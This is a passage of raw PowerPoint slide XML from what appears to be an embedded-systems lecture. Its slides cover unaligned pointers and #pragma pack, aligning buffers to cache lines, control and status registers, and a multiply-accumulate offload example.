            <a:ext cx="2971800" cy="23082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uint16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p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4099" name="Object 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136270907"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3352800" y="1806575"/>
          <a:ext cx="5334000" cy="1631950"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s8273" name="Visio" r:id="rId6" imgW="6787440" imgH="2316600" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId6" imgW="6787440" imgH="2316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1806575"/>
                        <a:ext cx="5334000" cy="1631950"/>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3276561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0966"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="10"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dirty="0" smtClean="0"/>
              <a:t>Unaligned pointers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>Consider the following function:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>What happens when I call:</a:t>
            </a:r>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r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>Solution: use unaligned pointer:</a:t>
            </a:r>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r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>Note: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t> is 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1" smtClean="0"/>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t> commands, 6 bytes; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" i="1" dirty="0" smtClean="0"/>
              <a:t>func2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t> is 11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1" smtClean="0"/>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t> commands, 22 bytes!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2057400"/>
            <a:ext cx="4419600" cy="369888"/>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func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</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 { *p = 10; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="3048000"/>
            <a:ext cx="4419600" cy="1200150"/>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#pragma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pack(1)</a:t>
            </a:r>
          </a:p>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 char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a;</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b; } s;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#pragma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pack()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>main() { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>func</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s.b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="1905000"/>
            <a:ext cx="2514600" cy="9239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pt-BR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	%r1,10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>j_s.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	[%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>st_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	%r1,[%r0] </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="5029200"/>
            <a:ext cx="6096000" cy="369888"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>func2(_Unaligned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 { *p = 10; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1886310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dirty="0" smtClean="0"/>
              <a:t>Aligning buffers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>In some cases you may need to have a buffer n-byte aligned when n is more than 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Ex. A 64 byte structure that is accessed very often, in a system with a 64 byte cache-line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>You would want to have it 64 byte aligned so it fits in a single cache line, to improve performance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Method #1: allocate more data than needed</a:t>
            </a:r>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r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Method #2 – use compiler pragmas</a:t>
            </a:r>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r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Method #3 – put structure in aligned section using locator script file</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16388" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="3352800"/>
            <a:ext cx="6781800" cy="9239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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(MYSTRUCT) + CACHE_LINE_SIZE];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MYSTRUCT* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pStruct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = (MYSTRUCT*)(((</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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +   	CACHE_LINE_SIZE) &amp; ~(CACHE_LINE_SIZE-1));</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16389" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="4953000"/>
            <a:ext cx="6096000" cy="646113"/>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MYSTRUCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MyStruct</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#pragma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Align_to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(CACHE_LINE_SIZE, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MyStruct</a:t>
            </a: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7824049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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Hardware / Firmware Interfaces</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66565" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35740841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smtClean="0"/>
              <a:t>Control &amp; Status Registers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69635" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1600200"/>
            <a:ext cx="8382000" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The processor interacts with a peripheral devices through a set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Control and Status Registers (CSR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The semantics of registers are features of the peripheral device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t think of registers as of memory, think of them as of an API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38514913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1517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0343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937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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Example 1 – Multiplier and Accumulator (MAC) offload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Multiply two 32 bit numbers into a 64 bit product, accumulate results into a 96 accumulator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>MAC(A,B):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Prod = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>AxB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Acc += Prod</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Useful in some cryptographic operations, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>. RSA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The processor may not support a “multiply” command, let alone 64 bit number operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Implementing in firmware requires many cycles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38925071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smtClean="0"/>
              <a:t>MAC reg 1: multiplier</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="71724" name="Group 44"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1366165253"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
